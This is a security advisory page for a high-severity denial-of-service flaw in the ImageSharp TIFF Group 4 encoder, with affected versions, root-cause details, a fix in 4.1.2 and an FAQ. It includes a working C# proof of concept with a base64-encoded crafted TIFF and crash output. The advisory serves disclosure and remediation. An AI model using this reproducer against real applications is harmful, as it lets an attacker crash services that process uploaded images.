GHSA-jjfr-hcj7-qf5w: High severity nuget/SixLabors.ImageSharp vulnerability

Published Oct 7, 2026
·
Updated

Summary

The TIFF CCITT Group 4 (T6) encoder writes beyond its logical compressed-data buffer when encoding a 1-bit image. A valid 1×1 Group 4 TIFF decoded and re-encoded with the default TiffEncoder terminates the process with an unhandled exception.

Affected package and versions

- Package: SixLabors.ImageSharp (NuGet) - Affected range: >= 2.1.0, <= 4.1.1 - Commit 0815358f9202a78bc7f3b83e19282dc3654b500f corresponds to release v4.1.1.

The T6 compressor was introduced by commit 3c9eb470a07a15012c2a29ad84090dcc804a7975, first released in v2.1.0, with the same Width rowsPerStrip allocation and unchecked code writes. The 1×1 exploit terminates published v2.1.0 and v4.1.1; its uncompressed control succeeds. Source history shows no capacity fix through v4.1.1. Details

TiffCcittCompressor.Initialize allocates Width rowsPerStrip bytes. A 1×1 strip therefore receives one byte.

After encoding the row, T6BitCompressor.CompressStrip appends two 12-bit EOFB codes. WriteCode writes those bits without checking the destination capacity. The final checked slice detects the oversized byte count and throws ArgumentOutOfRangeException, after the unchecked writes have exceeded the one-byte span.

The default TIFF encoder can inherit CcittGroup4Fax and 1-bit settings from decoded frame metadata. The reproduction uses that decode-and-re-encode path.

Tested environment

- Published NuGet package: SixLabors.ImageSharp 4.1.1 - Target framework: net8.0 - .NET SDK: 8.0.424 - .NET runtime: 8.0.30 - Operating system: Debian GNU/Linux 12, ARM64, Docker

No active exploitation is known.

Reproduction

Create a net8.0 project referencing the published 4.1.1 assembly and use this Program.cs:

csharp using SixLabors.ImageSharp; using SixLabors.ImageSharp.Formats.Tiff; using SixLabors.ImageSharp.Formats.Tiff.Constants;

string mode = args.FirstOrDefault() ?? "exploit"; byte[] input = Convert.FromBase64String( "SUkqAAgAAAAJAAABAwABAAAAAQAAAAEBAwABAAAAAQAAAAIBAwABAAAAAQAAAAMBAwABAAAABAAAAAYBAwABAAAAAAAAABEBBAABAAAAegAAABUBAwABAAAAAQAAABYBBAABAAAAAQAAABcBBAABAAAABAAAAAAAAACACACA");

using Image image = Image.Load(input); var metadata = image.Frames.RootFrame.Metadata.GetTiffMetadata(); Console.WriteLine($"ImageSharp={typeof(Image).Assembly.GetName().Version}"); Console.WriteLine($"mode={mode} decoded={image.Width}x{image.Height} compression={metadata.Compression} bits={metadata.BitsPerPixel}");

using var output = new MemoryStream(); if (mode == "control") { image.Save(output, new TiffEncoder { Compression = TiffCompression.None }); } else { image.Save(output, new TiffEncoder()); }

Console.WriteLine($"encoded=True bytes={output.Length}");

Run:

text dotnet run -- exploit dotnet run -- control

The exploit produced exit code 134:

text ImageSharp=4.0.0.0 mode=exploit decoded=1x1 compression=CcittGroup4Fax bits=Bit1 Unhandled exception. System.ArgumentOutOfRangeException: Specified argument was out of the range of valid values. at SixLabors.ImageSharp.Formats.Tiff.Compression.Compressors.TiffCcittCompressor.CompressStrip(Span1 rows, Int32 height)

The control completed with exit code 0:

text ImageSharp=4.0.0.0 mode=control decoded=1x1 compression=CcittGroup4Fax bits=Bit1 encoded=True bytes=212

Impact

One attacker-supplied Group 4 TIFF can select this unsafe encoder path when an application decodes it and re-encodes it with inherited TIFF metadata. The demonstrated result is an unhandled exception and process termination in the reproduction. The report is limited to the T6 encoder path.

Affected Software

1 affected componentFixes available
nuget/SixLabors.ImageSharp>=2.1.0<=4.1.1
4.1.2

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade nuget/SixLabors.ImageSharp to a version that resolves this vulnerability.

    Fixed in 4.1.2
  2. Configuration

    Explicitly configure the TIFF encoder to use TiffCompression.None instead of inheriting CcittGroup4Fax from decoded frame metadata when re-encoding attacker-supplied TIFF images.

    SixLabors.ImageSharp TiffEncoder Compression = TiffCompression.None

Event History

Oct 7, 2026
Advisory Published
via GitHub·08:24 PM
Data Sourced
via GitHub·08:24 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

Which deployments are exposed to this issue?

Applications using SixLabors.ImageSharp versions 2.1.0 through 4.1.1 are affected when they encode 1-bit images with TIFF CCITT Group 4 (T6) compression. The vulnerable compressor was introduced in version 2.1.0, and source history shows no capacity fix through 4.1.1.

2

What must an attacker be able to do to trigger the denial of service?

An attacker needs to cause the application to decode and then re-encode a 1-bit Group 4 TIFF image. A valid 1×1 Group 4 TIFF is sufficient to trigger an unhandled exception during re-encoding.

3

Is the default TIFF encoding configuration affected?

Yes. The supplied 1×1 Group 4 TIFF reproducer terminates the process when re-encoded with the default TiffEncoder.

4

How can I determine whether my application is vulnerable?

Verify whether the application uses an affected ImageSharp version and re-encodes 1-bit TIFF images using Group 4 compression. Re-encoding a valid 1×1 Group 4 TIFF with the default TiffEncoder causes the affected published versions to terminate with an unhandled exception.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203